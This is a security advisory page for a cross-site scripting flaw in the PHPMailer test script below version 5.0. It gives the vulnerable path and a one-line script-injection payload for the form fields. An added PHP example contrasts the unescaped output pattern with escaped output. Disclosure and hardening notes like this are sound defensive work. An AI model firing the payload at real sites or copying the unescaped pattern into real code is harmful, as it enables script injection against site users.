PHPMailer Test Page < 5.0 Cross-Site-Scripting - CXSecurity.com

Vulnerability ID 1214910 Vulnerability Type
Published 2018-07-07 Updated 2018-07-07
CVE ID N/A CNNVD-ID N/A
Affected Platform N/A CVSS Score N/A
|Source
https://cxsecurity.com/issue/WLB-2018070071
|Vulnerability Details
Vulnerability details have not yet been disclosed.
|Exploit
# Exploit Title: PHPMailer Test Page < 5.0 Cross-Site-Scripting
# Date: 2018-07-06 
# Exploit Author: Omba
# Vendor Homepage: https://github.com/PHPMailer
# Software Link: https://github.com/PHPMailer/PHPMailer
# Version: [5.0]
# CVE: N/A
# Tested on: MacOS High Sierra / Linux Mint / Windows 10
  
# Vulnerable Parameter Type: GET 
# Vulnerable Parameter: www.example.com/phpmailer/test_script/ 
  
# Proof of Concepts:
  
www.example.com/phpmailer/test_script/
  
Fill in all the "Mail Details" fields

Payload: “><script>alert(/Xss-By-Omba/)</script>

and click Submit.
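
The payload's leading quote and `>` suggest the submitted value is written back into a quoted HTML attribute without escaping. The sketch below is an added example, not PHPMailer's code: it places that pattern beside the output-escaped form, with the field names, the helpers `e()` and `field()`, and the sample input all constructed for illustration.

```php
<?php
declare(strict_types=1);
// Added illustration; not taken from PHPMailer. Field names are hypothetical.

/** Escape a value for HTML element text or a quoted attribute value. */
function e(string $value): string
{
    // ENT_QUOTES encodes both " and '; ENT_SUBSTITUTE replaces invalid UTF-8
    // sequences instead of returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Read a submitted field as a string; array input (name[]=x) is treated as empty. */
function field(array $src, string $name): string
{
    $v = $src[$name] ?? '';
    return is_string($v) ? $v : '';
}

// Constructed sample input standing in for a submitted "Mail Details" form.
// A harmless <b> marker is used in place of a script element.
$submitted = ['From' => '"><b>marker</b>', 'Subject' => 'hello'];

// Vulnerable pattern: the raw value lands inside value="...", so a double
// quote in the input closes the attribute and the rest is parsed as markup.
$unsafe = '<input type="text" name="From" value="'
        . field($submitted, 'From') . '">';

// Hardened pattern: identical markup, value escaped at output time, so the
// quote and angle brackets are rendered as text inside the attribute.
$safe = '<input type="text" name="From" value="'
      . e(field($submitted, 'From')) . '">';

echo $unsafe, PHP_EOL;
echo $safe, PHP_EOL;
```

Escaping belongs at the point of output rather than at input, and a test or example directory such as `test_script/` should not be deployed under a public web root.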